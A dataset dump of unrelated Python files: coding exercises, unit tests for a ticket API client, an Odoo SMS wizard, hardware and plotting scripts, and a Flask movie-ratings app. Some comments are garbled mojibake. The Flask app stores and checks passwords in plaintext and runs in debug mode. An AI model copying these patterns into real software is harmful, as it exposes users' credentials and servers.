text stringlengths 38 1.54M |
|---|
# 1์ด ๋ ๋๊น์ง
# N, K <= 100,000 ์ด๋ฏ๋ก ์๊ฐ๋ณต์ก๋ O(X lgX) ์์
N, K = map(int, input().rstrip().split())
# ๋ด ํ์ด
# > ์ด ํ์ด๊ฐ ํ์ํ ๊ฒฝ์ฐ
# 1. ๋๋์
ํ ์ ์๋ ์๊ฐ 2๊ฐ ์ด์
# ์ด ๊ฒฝ์ฐ๋ ์๋
# 1. ๋บ์
ํ ์ ์๋ ์๊ฐ 2๊ฐ ์ด์
#
# d์ ๊ฐ ์์๋ฅผ ๊ทธ๋ํ์ ์ ์ ์ผ๋ก, ๋๋์
๋๋ ๋บ์
์ผ๋ก ์๊ฐ ๋ณํํ๋ ๊ฒ์ ๊ฐ์ ์ผ๋ก ์๊ฐํ๋ฉด, ์ต์ ๊ฒฝ๋ก๋ฅผ ๊ตฌํ๋๋ฐ memoization, ์ฌ๊ทํจ์, for๋ฐ๋ณต๋ฌธ ๋ฑ ์์ ์ค ๋ฌด์์ด ํ์ํ ์ง ์ ์ ์๋ค.
d = [0]*(N + 1)
def rec(n, step=0):
global K
global d
d[n] = step
if n == 1:
return step
if N % K == 0:
return rec(n // K, step + 1)
return rec(n - 1, step + 1)
return -1
print(rec(N))
# ์ฑ
ํ์ด
# ํ์ํ์ง ์๊ณ 1. K๋ก ๋๋๊ธฐ 2. 1 ๋บด๊ธฐ ์ฐ์ ์์๋ก ์ฐ์ฐ์ ํ๋ฉด "์ต์ ์ ํด๋ฅผ ๋ณด์ฅ" ํ๋ค.
answer = 0
while N != 1:
if N % K == 0:
N //= K
else:
N -= 1
answer += 1
print(answer) |
import pandas as pd
import numpy as np
from Classwork import Basic_stats
salary = [82,76,24,40,67,62,75,78,71,32,98,89,78,67,72,82,87,66,56,52]
bs = Basic_stats()
b = bs.bs_median(salary)
print(b)
print(bs.bs_outliers(salary)) |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, exceptions, fields, models, _
from odoo.addons.phone_validation.tools import phone_validation
class MassSMSTest(models.TransientModel):
_name = 'mailing.sms.test'
_description = 'Test SMS Mailing'
def _default_numbers(self):
return self.env.user.partner_id.phone_sanitized or ""
numbers = fields.Char(string='Number(s)', required=True,
default=_default_numbers, help='Comma-separated list of phone numbers')
mailing_id = fields.Many2one('mailing.mailing', string='Mailing', required=True, ondelete='cascade')
def action_send_sms(self):
self.ensure_one()
numbers = [number.strip() for number in self.numbers.split(',')]
sanitize_res = phone_validation.phone_sanitize_numbers_w_record(numbers, self.env.user)
sanitized_numbers = [info['sanitized'] for info in sanitize_res.values() if info['sanitized']]
invalid_numbers = [number for number, info in sanitize_res.items() if info['code']]
if invalid_numbers:
raise exceptions.UserError(_('Following numbers are not correctly encoded: %s, example : "+32 495 85 85 77, +33 545 55 55 55"', repr(invalid_numbers)))
record = self.env[self.mailing_id.mailing_model_real].search([], limit=1)
body = self.mailing_id.body_plaintext
if record:
# Returns a proper error if there is a syntax error with jinja
body = self.env['mail.render.mixin']._render_template(body, self.mailing_id.mailing_model_real, record.ids)[record.id]
self.env['sms.api']._send_sms_batch([{
'res_id': 0,
'number': number,
'content': body,
} for number in sanitized_numbers])
return True
|
from unittest import TestCase, skip
from configparser import ConfigParser
import os
import ticketpy
from ticketpy.client import ApiException
from math import radians, cos, sin, asin, sqrt
def haversine(latlon1, latlon2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
Sourced from Stack Overflow:
https://stackoverflow.com/questions/4913349/haversine-formula-in-python-bearing-and-distance-between-two-gps-points
"""
# convert decimal degrees to radians
lat1 = float(latlon1['latitude'])
lon1 = float(latlon1['longitude'])
lat2 = float(latlon2['latitude'])
lon2 = float(latlon2['longitude'])
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
r = 3956 # Radius of earth in kilometers. Use 6371 for kilometers
return c * r
def get_client():
"""Returns ApiClient with api key from config.ini"""
config = ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
api_key = config.get('ticketmaster', 'api_key')
return ticketpy.ApiClient(api_key)
class TestApiClient(TestCase):
def setUp(self):
self.api_client = get_client()
def test_parse_link(self):
base_str = "https://app.ticketmaster.com/discovery/v2/events"
param_str = ("sort=date,asc"
"&marketId=10"
"&keyword=LCD%20Soundsystem")
full_url = '{}?{}'.format(base_str, param_str)
parsed_link = self.api_client._parse_link(full_url)
self.assertEqual(base_str, parsed_link.url)
params = parsed_link.params
self.assertEqual('date,asc', params['sort'])
self.assertEqual('10', params['marketId'])
self.assertEqual('LCD Soundsystem', params['keyword'])
self.assertEqual(self.api_client.api_key['apikey'], params['apikey'])
def test_apikey(self):
tmp_client = ticketpy.ApiClient('random_key')
self.assertIn('apikey', tmp_client.api_key)
self.assertEqual('random_key', tmp_client.api_key['apikey'])
def test_url(self):
expected_url = "https://app.ticketmaster.com/discovery/v2"
self.assertEqual(self.api_client.url, expected_url)
def test_method_url(self):
murl = self.api_client._ApiClient__method_url
expected_url = "https://app.ticketmaster.com/discovery/v2/events.json"
events_url = murl('events')
self.assertEqual(expected_url, events_url)
def test_bad_key(self):
bad_client = ticketpy.ApiClient('asdf')
self.assertRaises(ApiException, bad_client.venues.find, keyword="a")
def test__bad_request(self):
# Radius should be a whole number, so 1.5 should raise ApiException
radius = '1.5'
lat = '33.7838737'
long = '-84.366088'
self.assertRaises(ApiException, self.api_client.events.by_location,
latitude=lat, longitude=long, radius=radius)
def test___yes_no_only(self):
yno = self.api_client._ApiClient__yes_no_only
self.assertEqual(yno('yes'), 'yes')
self.assertEqual(yno('YES'), 'yes')
self.assertEqual(yno('Yes'), 'yes')
self.assertEqual(yno(True), 'yes')
self.assertEqual(yno('no'), 'no')
self.assertEqual(yno('NO'), 'no')
self.assertEqual(yno('No'), 'no')
self.assertEqual(yno(False), 'no')
self.assertEqual(yno('only'), 'only')
self.assertEqual(yno('ONLY'), 'only')
self.assertEqual(yno('Only'), 'only')
self.assertEqual(yno('asdf'), 'asdf')
self.assertEqual(yno('Asdf'), 'asdf')
class TestVenueQuery(TestCase):
def setUp(self):
self.tm = get_client()
self.venues = {
'smithes': 'KovZpZAJledA',
'tabernacle': 'KovZpaFEZe'
}
def test_find(self):
venue_list = self.tm.venues.find(keyword="TABERNACLE").limit(2)
for v in venue_list:
self.assertIn("TABERNACLE", v.name.upper())
def test_by_name(self):
# Make sure this returns only venues matching search terms...
venue_name = "TABERNACLE"
state = "GA"
venue_list = self.tm.venues.by_name(venue_name, state).limit(2)
for venue in venue_list:
self.assertIn(venue_name, venue.name.upper())
def test_get_venue(self):
venue_name = 'Tabernacle'
v = self.tm.venues.by_id(self.venues['tabernacle'])
self.assertEqual(self.venues['tabernacle'], v.id)
self.assertIn(venue_name, v.name)
class TestClassificationQuery(TestCase):
def setUp(self):
self.tm = get_client()
def test_classification_search(self):
classif = self.tm.classifications.find(keyword="DRAMA").limit()
segment_names = [cl.segment.name for cl in classif]
self.assertIn('Film', segment_names)
genre_names = []
for cl in classif:
genre_names += [g.name.upper() for g in cl.segment.genres]
self.assertIn("DRAMA", genre_names)
def test_classification_by_id(self):
genre_id = 'KnvZfZ7vAvE'
nested_genre = self.tm.classifications.by_id(genre_id)
genre_ids = [genre.id for genre in nested_genre.segment.genres]
self.assertIn(genre_id, genre_ids)
def test_classification_by_id_404(self):
self.assertRaises(ApiException, self.tm.classifications.by_id, 'asdf')
def test_segment_by_id(self):
seg_id = 'KZFzniwnSyZfZ7v7nJ'
seg_name = 'Music'
seg = self.tm.segment_by_id(seg_id)
self.assertEqual(seg_id, seg.id)
self.assertEqual(seg_name, seg.name)
seg_x = self.tm.segment_by_id(seg_id)
self.assertEqual(seg_id, seg_x.id)
self.assertEqual(seg_name, seg_x.name)
def test_genre_by_id(self):
genre_id = 'KnvZfZ7vAvE'
genre_name = 'Jazz'
g = self.tm.genre_by_id(genre_id)
self.assertEqual(genre_id, g.id)
self.assertEqual(genre_name, g.name)
g_x = self.tm.genre_by_id(genre_id)
self.assertEqual(genre_id, g_x.id)
self.assertEqual(genre_name, g_x.name)
def test_subgenre_by_id(self):
subgenre_id = 'KZazBEonSMnZfZ7vkdl'
subgenre_name = 'Bebop'
sg = self.tm.subgenre_by_id(subgenre_id)
self.assertEqual(subgenre_id, sg.id)
self.assertEqual(subgenre_name, sg.name)
sg_x = self.tm.subgenre_by_id(subgenre_id)
self.assertEqual(subgenre_id, sg_x.id)
self.assertEqual(subgenre_name, sg_x.name)
class TestAttractionQuery(TestCase):
def setUp(self):
self.tm = get_client()
def test_attraction_search(self):
attr_name = "YANKEES"
attractions = self.tm.attractions.find(keyword=attr_name).limit(1)
attraction_names = [a.name for a in attractions]
matched = False
for a in attraction_names:
if attr_name in a.upper():
matched = True
self.assertTrue(matched)
def test_attraction_by_id(self):
attraction_id = 'K8vZ9171okV'
attraction_name = 'New York Yankees'
attr = self.tm.attractions.by_id(attraction_id)
self.assertEqual(attraction_id, attr.id)
self.assertEqual(attraction_name, attr.name)
class TestEventQuery(TestCase):
def setUp(self):
self.tm = get_client()
@skip("Skipping until test update")
def test_get_event_id(self):
# TODO search events, then pull a specific ID to use here
event_id = 'vvG1zZfbJQpVWp'
e = self.tm.events.by_id(event_id)
self.assertEqual(event_id, e.id)
def test_get_event_id_404(self):
self.assertRaises(ApiException, self.tm.events.by_id, "asdf")
def test_search_events_by_location(self):
# Search for events within 1 mile of lat/lon
# Coordinates here are vaguely within Virginia Highlands
# It might be sort of overkill, but the distance between the
# original latitude/longitude is measured against what's
# returned for the venue and we only evaluate events/venues
# within 3 miles of the original coordinates. This is because
# the API will return crazy far results if you let it
# (ex: sorting by date,asc returns events in Austin...)
city = 'Atlanta'
latlon1 = {'latitude': '33.7838737', 'longitude': '-84.366088'}
event_list = self.tm.events.by_location(
latitude=latlon1['latitude'],
longitude=latlon1['longitude'],
radius=3,
unit='miles'
).limit(3)
all_nearby = []
for e in event_list:
nearby = [v for v in e.venues if
haversine(latlon1,
{'latitude': v.location['latitude'],
'longitude': v.location['longitude']}) <= 3]
all_nearby += nearby
# Ensure we aren't passing the test on an empty list
self.assertGreater(len(all_nearby), 0)
# Every city in the (populated) list should be Atlanta
for v in all_nearby:
self.assertEqual(city, v.city)
self.assertEqual(city, v.location['city'])
def test_search_events(self):
venue_id = 'KovZpaFEZe'
venue_name = 'Tabernacle'
event_list = self.tm.events.find(venue_id=venue_id, size=2).limit(4)
for e in event_list:
for v in e.venues:
with self.subTest(venue_id=venue_id):
self.assertEqual(venue_id, v.id)
with self.subTest(venue_name=venue_name):
self.assertIn(venue_name, v.name)
def test_events_get(self):
genre_name = 'Hip-Hop'
venue_id = 'KovZpZAJledA'
venue_name = "Smith's Olde Bar"
elist = self.tm.events.find(
classification_name=genre_name,
venue_id=venue_id
).limit(2)
for e in elist:
for v in e.venues:
self.assertEqual(venue_id, v.id)
self.assertEqual(venue_name, v.name)
genres = [ec.genre.name for ec in e.classifications]
matches = False
for g in genres:
if genre_name in g:
matches = True
self.assertTrue(matches)
class TestPagedResponse(TestCase):
def setUp(self):
self.tm = get_client()
def test_one(self):
# Generic search returns numerous pages, ensure only 1 is returned
event_list = self.tm.events.find(state_code='GA', size=7).one()
self.assertEqual(7, len(event_list))
resp = self.tm.venues.find(keyword='Tabernacle', size=5).one()
self.assertEqual(5, len(resp))
def test_limit(self):
# API page size default=20, limit(max_pages) default=5
with_defaults = self.tm.events.find().limit()
self.assertEqual(100, len(with_defaults))
# Switch up defaults
multi = self.tm.events.find(state_code='GA', size=8).limit(3)
self.assertEqual(24, len(multi))
def test_all(self):
# Manually iterate through response, then iterate automatically
# via all(), so both lists of venue IDs should be equal.
# page_counter should eventually equal the total_pages
# from the first page as well
page_iter = self.tm.venues.find(keyword="TABERNACLE", size=5)
iter_all = [venue.id for venue in page_iter.all()]
iter_manual = []
page_counter = 0
total_pages = None
for pg in page_iter:
if page_counter == 0:
total_pages = pg.total_pages
page_counter += 1
iter_manual += [venue.id for venue in pg]
self.assertEqual(page_counter, total_pages)
self.assertListEqual(iter_all, iter_manual)
|
from django.contrib import admin
from .models import Schoola
# Register your models here.
admin.site.register(Schoola) |
"""
judgement.py -- A flask-based ratings list
"""
# Remaining to do: Update a rating, clean up the interface and only allow logged in users to submit a rating
#Added session, url_for, escape for username login and g for global variables
# adding request is accessing the request object and same for redirect
from flask import Flask, render_template, request, redirect, url_for, session, flash
# connect to model
import model
#initializes program to be a Flask application
app = Flask(__name__)
# in order to use session, a secret key is needed to keep client side session secure
app.secret_key = "key"
# initialize application with config and from_object will import the object if its a string
app.config.from_object(__name__)
@app.route("/index")
def index():
# pull the user_id from the session
user_id = session.get("user_id", None)
# generate random list of users template
return redirect(url_for("list_users"))
# generate the create_user page to capture user information (email, password, age, zipcode)
@app.route("/create_user")
def create_user():
return render_template("create_user.html")
# save information entered on create_user form
@app.route("/save_user", methods=["POST"])
def save_user():
# query to see if the user is in the db
# capture the input from the form
new_email = request.form['email']
new_password = request.form['password']
new_age = request.form['age']
new_zip = request.form['zipcode']
# apply the content of the form to model.User
new_user = model.User(email = new_email, password = new_password, age = new_age, zipcode = new_zip)
# add the object to a session
model.session.add(new_user)
# commit/save the information into db session.commit
model.session.commit()
return redirect(url_for("index"))
# We should be able to log in as a user
@app.route("/login", methods=['GET'])
def login():
return render_template("login.html")
# create view called authenticate
@app.route("/authenticate", methods=["POST"])
def authenticate():
user_email = request.form['email']
user_password = request.form['password']
#check model-db for user information and create an object of that information
user_info = model.session.query(model.User).filter_by(email = user_email, password = user_password).first()
# validate that the info exists otherwise send back to login
if user_info:
#capture the email from the form and apply to session - alternative request.form['email']
session['email'] = user_info.email
#capture id out of the user_info object and assign to session
session['user_id'] = user_info.id
flash('Logged in as:' + user_email)
# ratings = user_info.ratings
# ratings = model.session.query(model.Rating).filter_by(user_id=user_info.id).all()
return redirect(url_for('user_ratings', id=user_info.id))
else:
#post message on screen if username or password are incorret
flash('Invalid username or password', 'error')
return redirect(url_for('login'))
# after getting the session variable back, you have to point it to a page
# return redirect(url_for("index"))
# logout a user
@app.route("/logout")
def logout():
#del session['user_id']
session.pop('email',None)
session.pop('user_id',None)
return redirect(url_for('index'))
# We should be able to view a list of all users
# Note you can pass id through view and funciton or through calling the session
@app.route("/list_users")
def list_users():
#capture user email if it exists in a session
user_email = session.get('email', None)
#user_email = session.get("email", None)
user_list = model.session.query(model.User).limit(5).all()
#user_list = model.session.query(model.User).all()
return render_template("list_users.html", user_list = user_list, user_email = user_email)
# We should be able to click on a user and view the list of movies they've rated, as well as ratings
# generate a ratings page based on users id
@app.route("/user_ratings/<int:id>")
# id = None in case there is no id
def user_ratings(id=None):
user_email = session.get('email', None)
if user_email:
flash('Click movie link to review ratings.', 'message')
else:
flash('Login to update ratings.', 'warning')
# sets sql query to pull ratings based on user id
user = model.session.query(model.User).get(id)
# ratings = model.session.query(model.Rating).filter_by(user_id=id).all()
# return a page of the user ratings by passing the queried information in user object
return render_template("user_ratings.html", user=user)
# View all ratings for a specific movie & note the int:id confirms id is type int
@app.route("/movie_ratings/<int:id>", methods=["GET"])
# id = None in case there is no id
def movie_ratings(id=None):
user_id = session.get('user_id', None)
# query for the object of whether the user rated this movie
user_rating_query = model.session.query(model.Rating).filter_by(user_id=user_id,movie_id=id).first()
# sets sql query to pull ratings based on movie id
movie = model.session.query(model.Movie).get(id)
if user_rating_query:
flash('You\'ve rated this movie as follows:' + str(user_rating_query.rating))
# return a page of the user ratings by passing the queried information in movie object
return render_template("movie_ratings.html", movie = movie, rating = user_rating_query)
else:
flash('Do you want to rate this movie?', 'message')
user = model.session.query(model.User).get(user_id)
prediction = user.predict_rating(movie)
# return a page of the user ratings by passing the queried information in movie object
return render_template("movie_ratings.html", movie = movie, prediction = prediction)
# We should be able to, when logged in and viewing a record for a movie, either add or update a personal rating for that movie
#@app.route("/add_rating")
@app.route('/rate_movie/<int:id>', methods=['POST'])
def rate_movie(id):
user_id = session['user_id']
rating_submitted = int(request.form['rating_select'])
log_rating = model.Rating(user_id = user_id, movie_id = id, rating = rating_submitted)
model.session.add(log_rating)
model.session.commit()
flash("You've added a rating")
return redirect(url_for('user_ratings', id = user_id))
# Display search
@app.route("/search", methods=["GET"])
def display_search():
return render_template("search.html")
# Search for a movie
@app.route("/search", methods=["POST"])
def search():
query = request.form['query']
movies = model.session.query(model.Movie).filter(model.Movie.title.ilike("%" + query +"%")).limit(20).all()
return render_template('results.html', movies=movies)
# Given a user U who has not rated movie X, find all other users who have rated that movie
# For each other user O, find the movies they have rated in common with user U
# Pair up the common movies, then feed each pair list into the pearson function to find similarity S
# Rank the users by their similiarities and find the suer with the highest similarity, O
# Multiply the similarity coefficient of user O with their rating for moie X - This is the prediction
if __name__ == "__main__":
# turn on Flask debug mode- browser does a traceback in browser
# never leave this on when on a production system because allows users to execute code on server
app.run(debug=True) |
import numpy as np
import time
import thread
import rospy
from std_msgs.msg import Float32MultiArray
def input_thread(a_list):
raw_input()
a_list.append(True)
if __name__=="__main__":
pub = rospy.Publisher("/sim/move", Float32MultiArray, queue_size=10)
rospy.init_node("move")
start = time.time()
forwards = [1,1,1,1,0,0,0,0]
backwards = [-1,-1,-1,-1,0,0,0,0]
right = [-1,1,1,-1,0,0,0,0] #top view
left = [1,-1,-1,1,0,0,0,0]
dirs = [forwards,right,backwards,left]
ct = 0
toPub = forwards
a_list = []
thread.start_new_thread(input_thread, (a_list,))
print("Started sending. Press enter to kill.")
while not a_list:
#now = rospy.get_rostime()
#rospy.loginfo("Current time %i %i", now.secs, now.nsecs)
#print(now)
data = Float32MultiArray()
if (time.time()-start>5):
ct = (ct+1)%4
start = time.time()
data.data = dirs[ct]
pub.publish(data)
data = Float32MultiArray()
data.data = [0,0,0,0,0,0,0,0]
pub.publish(data)
|
import sys
import usb
import time
import struct
import array
import math
class DeviceDescriptor(object) :
def __init__(self, vendor_id, product_id, interface_id) :
self.vendor_id = vendor_id
self.product_id = product_id
self.interface_id = interface_id
def getDevice(self) :
"""
Return the device corresponding to the device descriptor if it is
available on a USB bus. Otherwise, return None. Note that the
returned device has yet to be claimed or opened.
"""
buses = usb.busses()
for bus in buses :
for device in bus.devices :
if device.idVendor == self.vendor_id :
if device.idProduct == self.product_id :
return device
return None
class PlugUSBDevice(object) :
PLUG_VENDOR_ID = 0x03EB
PLUG_PRODUCT_ID = 0x6124
PLUG_INTERFACE_ID = 0
PLUG_BULK_IN_EP = 2
PLUG_BULK_OUT_EP = 1
def __init__(self) :
self.device_descriptor = DeviceDescriptor(PlugUSBDevice.PLUG_VENDOR_ID,
PlugUSBDevice.PLUG_PRODUCT_ID,
PlugUSBDevice.PLUG_INTERFACE_ID)
self.device = self.device_descriptor.getDevice()
self.handle = None
def open(self) :
self.device = self.device_descriptor.getDevice()
self.handle = self.device.open()
if sys.platform == 'darwin' :
# XXX : For some reason, Mac OS X doesn't set the
# configuration automatically like Linux does.
self.handle.setConfiguration(1)
self.handle.claimInterface(self.device_descriptor.interface_id)
def close(self) :
self.handle.releaseInterface()
def getDataPacket(self, bytesToGet) :
"""
Assume bytesToGet is two bytes wide.
"""
self.handle.bulkWrite(PlugUSBDevice.PLUG_BULK_OUT_EP,
chr(0)+chr(bytesToGet & 0xFF)+chr(bytesToGet>>8),
200)
# XXX : Gah! Returns a tuple of longs. Why doesn't it return
# a string?
return self.handle.bulkRead(PlugUSBDevice.PLUG_BULK_IN_EP,
bytesToGet,
200)
class PlugSensors(object) :
def __init__(self,
bytesPerDataPacket=64,
bitsPerSample=10,
channelsPerScan=8,
scansPerDataPacket=6) :
# Number of bytes the Plug returns in a sensors data packet.
self.bytesPerDataPacket = bytesPerDataPacket
# Resolution at which ADC samples inputs.
self.bitsPerSample = bitsPerSample
# Number of ADC channels sampled in a single pass.
self.channelsPerScan = channelsPerScan
# Number of times all ADC channels are sampled per packet.
self.scansPerDataPacket = scansPerDataPacket
# Needed to convert from signed longs to string.
self.__unpack_format__ = 'B'*self.bytesPerDataPacket
# Needed to convert from string to unsigned bytes.
self.__pack_format__ = 'b'*self.bytesPerDataPacket
# Information not generated by ADC.
self.numADCBytes = self.bitsPerSample*self.channelsPerScan*self.scansPerDataPacket/8
self.skippedSamplesIndex = self.bitsPerSample*self.channelsPerScan*self.scansPerDataPacket/8
self.bytesUsedIndex = self.skippedSamplesIndex + 1
self.vibrationIndex = self.skippedSamplesIndex + 2
assert self.bytesPerDataPacket*8 >= self.bitsPerSample*self.channelsPerScan*self.scansPerDataPacket
self.plug = PlugUSBDevice()
self.plug.open()
def logSamplesToFile(self, filename) :
f = file(filename, 'w')
print "To stop data collection, type <CTRL> + c."
startTime = time.time()
f.write("# Plug data log. Data format is:\n#\n")
f.write("# current time in seconds\n")
f.write("# scans recorded between the last time and the current time\n")
f.write("# scans skipped between the last time and the current time\n")
f.write("# light samples\n")
f.write("# sound samples\n")
f.write("# vibration samples\n")
f.write("# voltage samples\n")
f.write("# current1 samples\n")
f.write("# current2 samples\n")
f.write("# current3 samples\n")
f.write("# current4 samples\n")
f.write("# expansion samples\n")
while True :
try :
data = self.getSamples()
format_string = ("%d\t"*(data['scans_recorded']-1) + "%d\n")
f.write("\n%f\n" % data['time'])
f.write("%d\n" % data['scans_recorded'])
f.write("%d\n" % data['scans_skipped'])
f.write(format_string % tuple(data['light']))
f.write(format_string % tuple(data['sound']))
f.write(format_string % tuple(data['vibration']))
f.write(format_string % tuple(data['voltage']))
f.write(format_string % tuple(data['current1']))
f.write(format_string % tuple(data['current2']))
f.write(format_string % tuple(data['current3']))
f.write(format_string % tuple(data['current4']))
f.write(format_string % tuple(data['expansion']))
except KeyboardInterrupt :
print "You have successfully logged data."
f.close()
return
def parseSamplesFromFile(self, filename) :
# Store sensor data in arrays of unsigned shorts (minimum of
# two bytes).
sensors = [array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H')]
# Store time data in an array of floats (minimum of 8 bytes).
seconds = array.array('d')
# Open the log file.
f = file(filename, 'r')
# Skip over the initial comments.
line = f.readline()
while line != '' and line[0] == "#" :
line = f.readline()
line = f.readline() # Skip blank line.
while line != '' :
time_recorded = float(line)
scans_recorded = int(f.readline())
scans_skipped = int(f.readline())
for i in range(scans_recorded) :
seconds.append(time_recorded)
for i in range(len(sensors)) :
for x in f.readline().split() :
sensors[i].append(int(x))
f.readline() # Skip blank line.
line = f.readline()
return {"seconds" : seconds,
"light" : sensors[0],
"sound" : sensors[1],
"vibration" : sensors[2],
"voltage" : sensors[3],
"current1" : sensors[4],
"current2" : sensors[5],
"current3" : sensors[6],
"current4" : sensors[7],
"expansion" : sensors[8]}
def getSamples(self) :
samples = {}
# Request and wait for a packet.
packet = self.plug.getDataPacket(self.bytesPerDataPacket)
# Convert data from signed to unsigned.
data = struct.unpack(self.__unpack_format__, struct.pack(self.__pack_format__, *packet))
# Get all metadata.
samples['time'] = time.time()
samples['scans_skipped'] = data[self.skippedSamplesIndex]
samples['scans_recorded'] = data[self.bytesUsedIndex]*8/(self.bitsPerSample*self.channelsPerScan)
# Unpack the two bytes of vibratab data.
samples['vibration'] = self.unpackBits(data[self.vibrationIndex:self.vibrationIndex+2], 1)[:samples['scans_recorded']]
# Unpack ADC data.
data = self.unpackBits(data[:self.numADCBytes], 10)
# XXX : This next portion is hard coded.
samples['light'] = [data[i] for i in range(0,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['sound'] = [data[i] for i in range(1,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['voltage'] = [data[i] for i in range(2,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['expansion'] = [data[i] for i in range(3,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current4'] = [data[i] for i in range(4,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current2'] = [data[i] for i in range(5,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current3'] = [data[i] for i in range(6,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current1'] = [data[i] for i in range(7,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
return samples
def unpackBits(self, s, bits) :
"""
Unpack a sequence s of bytes into a list of numbers each of bits length.
Assumes numbers are stored in little endian format and represent
unsigned integers.
"""
if (len(s)*8 < bits) :
return []
bitMask = int('1'*bits, 2)
numberOfValues = int(8*len(s)/bits)
currentByte = 0
currentBit = 0
values = []
while len(values) != numberOfValues :
bitsToGet = bits
if currentBit + bitsToGet < 8 :
value = (s[currentByte] >> currentBit) & bitMask
currentBit += bitsToGet
bitsToGet = 0
else :
value = (s[currentByte] >> currentBit)
bitsToGet -= (8 - currentBit)
currentBit = 0
currentByte += 1
for i in range(int(bitsToGet/8)) :
value |= (s[currentByte] << (bits - bitsToGet))
currentByte += 1
bitsToGet -= 8
if bitsToGet :
value |= ((s[currentByte] & int('1'*bitsToGet, 2)) << (bits - bitsToGet))
currentBit = bitsToGet
values.append(value)
return values
def main(argv=None) :
if argv is None :
script_name = sys.argv[0]
argv = sys.argv[1:]
if len(argv) == 1 :
option = argv[0]
filename = "PlugSensors.dat"
elif len(argv) == 2 :
option = argv[0]
filename = argv[1]
else :
option = None
filename = None
if option == 'log' :
s = PlugSensors()
s.logSamplesToFile(filename)
s.plug.close()
elif option == 'parse' :
s = PlugSensors()
return s.parseSamplesFromFile(filename)
elif option == 'sensors' :
s = PlugSensors()
for i in range(10) :
print s.getSamples()
else :
print "Usage: python -i %s OPTION [FILENAME]" % script_name
print " where OPTION can be 'parse' or 'log'"
if __name__ == "__main__" :
data = main()
if type(data) == dict :
print "Parsed data is now availabe in the 'data' dictionary."
print "You can access the arrays of data looking at \"data['light']\", for example."
print "Use 'data.keys()' to list other options."
|
import sys
n = int(sys.stdin.readline())
a = [[int(i) for i in sys.stdin.readline().strip().split()] for _ in range(2)]
if n == 1:
print(a[0][0] + a[1][0])
else:
import itertools
top_accum = list(itertools.accumulate(a[0]))
bottom_accum_reverse = list(reversed(list(itertools.accumulate(reversed(a[1])))))
count_max = 0
for i in range(n):
count_max = max(count_max, top_accum[i] + bottom_accum_reverse[i])
print(count_max)
|
import cv2
import pytesseract
import numpy as np
from PIL import ImageGrab
import time
pytesseract.pytesseract.tesseract_cmd = 'C:\Program Files (x86)\Tesseract-OCR\\tesseract.exe'
img2 = cv2.imread('dtu.PNG')
img1=cv2.resize(img2,(512,512))
img = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
#print(pytesseract.image_to_string(img))
# print(pytesseract.image_to_boxes(img))
hImg, wImg,_ = img.shape
# boxes = pytesseract.image_to_boxes(img)
# for b in boxes.splitlines():
# print(b)
# b = b.split(' ')
# print(b)
# x, y, w, h = int(b[1]), int(b[2]), int(b[3]), int(b[4])
# cv2.rectangle(img, (x,hImg- y), (w,hImg- h), (50, 50, 255), 2)
# cv2.putText(img,b[0],(x,hImg- y+25),cv2.FONT_HERSHEY_SIMPLEX,1,(50,50,255),2)
boxes = pytesseract.image_to_data(img)
for a, b in enumerate(boxes.splitlines()):
print(b)
if a != 0:
b = b.split()
if len(b) == 12:
x, y, w, h = int(b[6]), int(b[7]), int(b[8]), int(b[9])
cv2.putText(img, b[11], (x, y-2), cv2.FONT_HERSHEY_DUPLEX, 0.5, (0, 0, 255), 1)
cv2.rectangle(img, (x, y), (x + w, y + h), (50, 50, 255), 2)
cv2.imshow('img', img)
cv2.waitKey(0) |
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 20:19:50 2020
@author: Nick Strandwitz
"""
### Plots LEIS profile from ascii file output of IONTof Qtac
### Created 2/29/2020 by Strandwitz; Last modified 2/29/2020 by Strandwitz
###
### TO DO: create stable loop for overlaying multiple scans
### Some general adjustable settins
lnwdth=5 # line width in plot
collabels=['scan', 'depth (nm)', 'dose', 'MoTe', 'Al/Si', 'O'] # Column labels, manually input headers here, must match dimensions
mrksz=15 # size of markers
### Brings up dialog box to select one or more files
import tkinter as tk
from tkinter import filedialog
root = tk.Tk()
root.withdraw()
root.call('wm','attributes','.', '-topmost', True)
filepath=filedialog.askopenfilenames(initialdir = "C:/Users/Nick Strandwitz/Documents/NCS docs/Data/LU/19.12.18-19 LEIS Training TiMoN ScN MoOx/101419-3-1/profile/", title = "select file",filetypes = (("all files","*.*"),("all files","*.*")))
print(len(filepath)) # print number of files selected
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
# Read in data, tab delimited, skip first row
df33 = pd.read_csv(filepath[0],
sep='\t',
skiprows=1,
header=None
)
df33.columns = collabels # Put those column labels in
ax1 = plt.gca() # Set up instance of axes
# Potentially modify below to make a loop for each element/region
# Plot each line; TO DO add loop to go through these?
df33.plot(kind='line',x=df33.columns[2],y=df33.columns[3], color='red', marker='s', markersize=mrksz, markeredgewidth=2, markeredgecolor='black', fontsize=20, ax=ax1, figsize=(8,8), lw=lnwdth)
df33.plot(kind='line',x=df33.columns[2],y=df33.columns[4], color='blue', marker='o', markersize=mrksz, markeredgewidth=2, markeredgecolor='black', ax=ax1, lw=lnwdth)
df33.plot(kind='line',x=df33.columns[2],y=df33.columns[5], color='violet', marker='<', markersize=mrksz, markeredgewidth=2, markeredgecolor='black', ax=ax1, lw=lnwdth)
# Format stuff
ax1.set_xlabel("Dose (10$^{15}$ cm$^{-2}$)", fontsize=30, fontname="Arial")
